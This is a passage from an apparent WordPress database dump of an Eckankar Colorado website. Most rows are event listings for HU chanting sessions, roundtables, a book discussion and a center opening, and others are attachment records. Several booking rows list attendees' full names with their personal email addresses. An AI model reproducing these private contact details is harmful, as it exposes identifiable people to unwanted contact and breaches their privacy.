Here.<br>\r\n</span></strong></span><span style=\"font-size: 20pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Here are some of the many benefits of HU:</span></strong></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.<br>\r\n</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 12pt;\">COVID-19 Safety Measures</span></strong><br>\r\n<span style=\"font-size: 12pt;\">Event will be indoors.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','SOUND OF SOUL - COLORADO SPRINGS IN PERSON TEMPLATE | Benefit Title Goes Here','','draft','closed','closed','','','','','2023-08-31 12:46:21','2023-08-31 18:46:21','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268251',0,'mec-events','',0),(268429,2,'2023-04-23 21:53:33','2023-04-24 03:53:33','','hu-6','','inherit','closed','closed','','hu-6','','','2023-04-23 21:53:33','2023-04-24 03:53:33','',268427,'https://eckankar-colorado.org/wp-content/uploads/2023/04/hu-6.jpg',0,'attachment','image/jpeg',0),(268430,2,'2023-04-24 09:49:38','2023-04-24 15:49:38','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><br>\r\n<span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">www.TheSoundofSoul.org</a>.</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><span style=\"font-size: 16pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!<br>\r\n</span></strong></span></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','15 Minutes to Change Your Life:<br>Tune into the Sound Current with HU - Online','','publish','closed','closed','','15-minutes-to-change-your-lifetune-into-the-sound-current-with-hu-online','','','2023-04-24 09:49:38','2023-04-24 15:49:38','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268430',0,'mec-events','',0),(268252,2,'2023-03-25 14:50:00','2023-03-25 20:50:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><strong>&nbsp;— This Event is for Eckankar Members —</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 20pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>To be followed by a tour of the new ECK Center.</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul - In Person<br>Colorado Springs','','publish','closed','closed','','experience-hu-the-sound-of-soul-in-personcolorado-springs','','','2023-03-27 13:25:00','2023-03-27 19:25:00','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268252',0,'mec-events','',0),(268255,2,'2023-03-25 16:58:57','2023-03-25 22:58:57','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>- This Event Is For Members Of Eckankar Only -</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\">Please join us for the Grand Opening of our new Colorado Springs ECK Center!</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Opening day activities will include the following:</span></strong></p>\r\n<ul class=\"\" style=\"list-style-type: square;\">\r\n	<li><span style=\"font-size: 14pt;\"><span style=\"color: #1d5791;\"><strong> HU Song<br>\r\n<br>\r\n</strong></span></span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\">Show and Tell Discussion on the theme: \"Be Who You Are and Share What You Love\".<br>\r\n<br>\r\n</span></strong></span></li>\r\n	<li><strong><span style=\"font-size: 14pt; color: #1d5791;\">Potluck Lunch</span></strong></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"> Please bring a dish to share at the Potluck.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">See you there!</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Grand Opening Celebration For Our New ECK Center!<br>In Person - Colorado Springs','','publish','closed','closed','','grand-opening-celebration-for-our-new-eck-center-in-personcolorado-springs','','','2023-03-27 13:33:18','2023-03-27 19:33:18','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268255',0,'mec-events','',0),(268258,2,'2023-03-25 21:52:29','2023-03-26 03:52:29','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">We are very excited to announce that Colorado Springs Eckankar will have a booth at this year’s Body, Mind, Spirit Expo!</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams? </span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECKANKAR BOOTH at Colorado Springs<br>Body Mind Spirit Expo','','publish','closed','closed','','eckankar-booth-at-colorado-springsbody-mind-spirit-expo','','','2023-03-27 13:07:42','2023-03-27 19:07:42','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268258',0,'mec-events','',0),(268259,2,'2023-03-25 21:51:53','2023-03-26 03:51:53','','body-mind-spirit-COSP-2023','','inherit','closed','closed','','body-mind-spirit-cosp-2023','','','2023-03-25 21:51:53','2023-03-26 03:51:53','',268258,'https://eckankar-colorado.org/wp-content/uploads/2023/03/body-mind-spirit-COSP-2023.jpg',0,'attachment','image/jpeg',0),(268261,1000014,'2023-03-26 11:45:00','2023-03-26 17:45:00','','Kery Colvin - keanchico@yahoo.com','','publish','closed','closed','','kery-colvin-keanchicoyahoo-com-6','','','2023-03-26 11:45:00','2023-03-26 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268261',0,'mec-books','',0),(268262,2,'2023-03-26 11:59:23','2023-03-26 17:59:23','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><strong>&nbsp;— This Event is for Eckankar Members —</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>The Colorado Springs ECK Center will be live streaming the April 9th, ECK Light and Sound Service, from the ECK Temple of Colorado.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 18.6667px;\">Please join us in person at 10:30 and enjoy watching the service with others on our big screen TV.</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Would you like to know your spiritual purpose for this lifetime?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Are you interested in fulfilling your destiny?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Do you know that you are a spiritual master in the making?</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, this service is for you. You will gain a deeper understanding of your purpose in this world and how to fulfill it.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book&nbsp;<em>Past Lives Dreams and Soul Travel</em>, p. 17, “The purpose of life is to become a Co-worker with God. It means service to others, using our talents and interests to give hand, ear, or heart to another in need.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Live Zoom Streaming of the ECK Temple Light and Sound Service<br>In Person - Colorado Springs','','publish','closed','closed','','your-spiritual-reason-for-living-eck-light-and-sound-servicelive-zoom-streaming-in-personcolorado-springs','','','2023-03-27 13:28:24','2023-03-27 19:28:24','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268262',0,'mec-events','',0),(268264,2,'2023-03-26 12:10:57','2023-03-26 18:10:57','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span class=\"\" style=\"font-size: 15pt;\"><strong>— This Event is for Eckankar Members —</strong></span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Roundtables are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy. Each roundtable&nbsp;consists of up to 12 participants.&nbsp;&nbsp;<br>\r\n</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Spiritual Lessons in Spiritual Service\'<br>Roundtable Discussion - In Person','','publish','closed','closed','','spiritual-lessons-in-spiritual-serviceroundtable-discussion-in-person','','','2023-03-27 13:36:27','2023-03-27 19:36:27','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268264',0,'mec-events','',0),(268265,2,'2023-03-26 12:29:05','2023-03-26 18:29:05','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #c9a11a;\">Access the God Current with HU. <br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','How to Enliven Every Aspect of Your Life','','publish','closed','closed','','experience-hu-the-sound-of-soul-in-personpueblo','','','2023-10-02 14:06:52','2023-10-02 20:06:52','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268265',0,'mec-events','',0),(268266,2,'2023-03-26 12:28:11','2023-03-26 18:28:11','','hu-custom-1','','inherit','closed','closed','','hu-custom-1','','','2023-07-30 09:27:13','2023-07-30 15:27:13','',268265,'https://eckankar-colorado.org/wp-content/uploads/2023/03/hu-custom-1.jpg',0,'attachment','image/jpeg',0),(268268,2,'2023-03-27 09:58:54','2023-03-27 15:58:54','','spring23-1','','inherit','closed','closed','','spring23-1','','','2023-03-27 09:58:54','2023-03-27 15:58:54','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/03/spring23-1.jpg',0,'attachment','image/jpeg',0),(268614,1000023,'2023-06-11 10:30:00','2023-06-11 16:30:00','','Bonnie G. - bngstreet@gmail.com','','publish','closed','closed','','bonnie-g-bngstreetgmail-com-5','','','2023-06-11 10:30:00','2023-06-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268614',0,'mec-books','',0),(268593,15,'2023-06-02 07:35:46','2023-06-02 13:35:46','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Develop A Powerful Spiritual Practice - Easy Ways To connect With Divine Spirit Every Day.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>Tune into the Sound current with HU.</strong></em></span><br>\r\n<span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span><br>\r\n<span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of </span><span style=\"font-size: 14pt;\">yourself.</span></p>\r\n<p class=\"mb-4\"><br>\r\n<span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><br>\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/293849134/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Develop A Powerful Spiritual Practice','','publish','closed','closed','','awaken-to-higher-consciousnessexperience-the-sound-of-soul-huin-person-spiritual-discussion-322','','','2023-06-21 21:18:45','2023-06-22 03:18:45','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268593',0,'mec-events','',0),(268440,2,'2023-05-02 14:13:02','2023-05-02 20:13:02','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>-<span style=\"font-size: 14pt;\">This Book Discussion Is Open To Members of Eckankar-</span></strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual gold awaits your discovery in the Shariyat-Ki-Sugmad book discussion. The Shariyat is a sacred guidebook like no other. It holds living truth for your past, present, and future. Join the book discussion and practice the spiritual exercises for the Shariyat. Together, they can be a key to unlocking the secrets of their beauty and power in your daily life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will be referring to and using both The <strong><em>Shariyat -Ki-Sugmad</em></strong>, Book One and the <strong><em>Spiritual Exercises for the Shariyat</em></strong>, Book One. Please have these books available during class and as you study.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We can also livestream this class at the CS ECK Center after the Sound of Soul event for those who would like to attend both events.&nbsp;</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase this book at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-2234-0.html\">ECK Bookstore</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong><span style=\"font-size: 18pt; color: #1d5791;\">For Online login information, please refer to the current version of the \'Colorado Springs Chela Newsletter\'.</span><br>\r\n</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'The Shariyat -Ki-Sugmad\' Book One<br>Book Discussion - Online','','publish','closed','closed','','the-shariyat-ki-sugmad-book-onebook-discussion-online','','','2023-06-28 21:48:31','2023-06-29 03:48:31','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268440',0,'mec-events','',0),(268465,1000081,'2023-05-14 10:30:00','2023-05-14 16:30:00','','Eileen Joy - eileenjoy12@gmail.com','','publish','closed','closed','','eileen-joy-eileenjoy12gmail-com-3','','','2023-05-14 10:30:00','2023-05-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268465',0,'mec-books','',0),(268466,0,'2023-05-13 16:32:54','2023-05-13 22:32:54','','','','publish','closed','closed','','268466','','','2023-05-13 16:32:54','2023-05-13 22:32:54','',0,'https://eckankar-colorado.org/nf_sub/268466/',0,'nf_sub','',0),(268467,1000023,'2023-05-14 10:30:00','2023-05-14 16:30:00','','Bonnie Greenstreet - bngstreet@gmail.com','','publish','closed','closed','','bonnie-greenstreet-bngstreetgmail-com-6','','','2023-05-14 10:30:00','2023-05-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268467',0,'mec-books','',0),(268436,0,'2023-04-29 21:20:47','2023-04-30 03:20:47','','','','publish','closed','closed','','268436','','','2023-04-29 21:20:47','2023-04-30 03:20:47','',0,'https://eckankar-colorado.org/nf_sub/268436/',0,'nf_sub','',0),(268437,0,'2023-04-30 15:36:33','2023-04-30 21:36:33','','','','publish','closed','closed','','268437','','','2023-04-30 15:36:33','2023-04-30 21:36:33','',0,'https://eckankar-colorado.org/nf_sub/268437/',0,'nf_sub','',0),(268279,2,'2023-03-27 14:04:18','2023-03-27 20:04:18','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Roundtables are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy. Each roundtable&nbsp;consists of up to 12 participants.&nbsp;&nbsp;<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Spiritual Lessons in Spiritual Service\'<br>Roundtable Discussion - In Person','','publish','closed','closed','','spiritual-lessons-in-spiritual-serviceroundtable-discussion-in-person-2','','','2023-03-27 14:04:18','2023-03-27 20:04:18','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268279',0,'mec-events','',0),(268280,2,'2023-03-27 14:01:38','2023-03-27 20:01:38','','beach-5','','inherit','closed','closed','','beach-5','','','2023-03-27 14:01:38','2023-03-27 20:01:38','',268279,'https://eckankar-colorado.org/wp-content/uploads/2023/03/beach-5.jpg',0,'attachment','image/jpeg',0),(268283,0,'2023-03-29 03:03:39','2023-03-29 09:03:39','','','','publish','closed','closed','','268283','','','2023-03-29 03:03:39','2023-03-29 09:03:39','',0,'https://eckankar-colorado.org/nf_sub/268283/',0,'nf_sub','',0),(268285,1000077,'2023-04-09 10:30:00','2023-04-09 16:30:00','','Gerald van Gogh - gvg1328@telus.net','','publish','closed','closed','','gerald-van-gogh-gvg1328telus-net','','','2023-04-09 10:30:00','2023-04-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268285',0,'mec-books','',0),(268286,0,'2023-03-30 08:05:18','2023-03-30 14:05:18','','','','publish','closed','closed','','268286','','','2023-03-30 08:05:18','2023-03-30 14:05:18','',0,'https://eckankar-colorado.org/nf_sub/268286/',0,'nf_sub','',0),(268290,2,'2023-03-31 09:12:59','2023-03-31 15:12:59','','2023-HI-Conf-Program-final2-web','','inherit','closed','closed','','2023-hi-conf-program-final2-web','','','2023-03-31 09:12:59','2023-03-31 15:12:59','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/03/2023-HI-Conf-Program-final2-web.pdf',0,'attachment','application/pdf',0),(268295,2,'2023-04-02 16:45:09','2023-04-02 22:45:09','','HI Conf Overview-FINAL-2-14-23','','inherit','closed','closed','','hi-conf-overview-final-2-14-23-2','','','2023-04-02 16:45:09','2023-04-02 22:45:09','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/03/HI-Conf-Overview-FINAL-2-14-23.pdf',0,'attachment','application/pdf',0),(268298,2,'2023-04-05 10:18:05','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 36px; padding-bottom: 14px;\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\">&nbsp;</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section bg-background-color color1-background-color color-1-text-contrast\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 14px; padding-bottom: 10px; background-color: #f2f3f4; border-width: 0px;\">\n<div class=\"col-md-6 col-sm-6 col-xs-12 col-lg-6\">\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 33px; text-align: left; margin-top: 11px; font-weight: 400; margin-bottom: 0px; border-width: 0px; color: #1d5791;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">Colorado Springs ECK Center</h1>\n<h4 class=\"\" style=\"font-size: 19px; font-weight: 600; line-height: 14px; border-width: 0px; font-family: \'Open Sans\'; margin-top: 25px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Master your spiritual destiny.</h4>\n<p class=\"\" style=\"font-size: 18px; line-height: 23px; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Find love, happiness, and balance in life.</p>\n<h2 class=\"\" style=\"font-size: 19px; text-transform: capitalize; font-family: Open Sans; font-weight: 400; line-height: 19px; border-width: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Phone:</strong> 719-633-0453</h2>\n<h2 class=\"\" style=\"font-size: 19px; text-transform: capitalize; line-height: 30px; font-family: \'Open Sans\'; font-weight: 400; margin-bottom: 10px; border-width: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>ECK Center Hours:<br>\n</strong><em>Open during in-person events</em></h2>\n<p class=\"\" style=\"margin-top: 36px; border-width: 0px;\"><a class=\"btn btn-color-1 btn-rounded btn-raised\" style=\"font-size: 17px; border-width: 0px; padding-left: 10px; padding-right: 10px;\" href=\"https://eckankar-colorado.org/colorado-springs-public-calendar-mec/\">Check The Colorado Springs Event Calendar</a></p>\n<div class=\"col-md-6 col-sm-6 col-xs-12 col-lg-6\">\n<div></div>\n</div>\n</div>\n<div class=\"col-lg-6 col-md-6 col-sm-12 col-xs-12\">\n<p class=\"\" style=\"margin-top: 11px;\"><img class=\"bg-img bg-img-rounded-bottom-right bg-img-rounded-top-left aligncenter wp-image-268313 size-full\" style=\"box-shadow: #bfbfbf 10px 10px 3px -3px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/co-springs-location-2023-v5.jpg\" alt=\"\" width=\"554\" height=\"323\"></p>\n</div>\n</div>\n</div>\n<div class=\"tmpl-contact-5 boldgrid-section dynamic-gridblock color1-background-color color-1-text-contrast bg-background-color\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 14px;\">\n<div class=\"col-md-12 col-sm-12 col-xs-12 bg-box-flush col-lg-12\">\n<p class=\"boldgrid-google-maps\" style=\"margin: 0px auto;\"><br>\n<iframe style=\"width: 100%;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3104.8541363866884!2d-104.86698958492248!3d38.904450779569494!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x871351cba3f0e41d%3A0x53cb1a5deb6da67c!2s5040%20Corporate%20Plaza%20Dr%20%235%2C%20Colorado%20Springs%2C%20CO%2080919!5e0!3m2!1sen!2sus!4v1680642278048!5m2!1sen!2sus\" width=\"2000\" height=\"325\" frameborder=\"0\"></iframe></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\"></div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 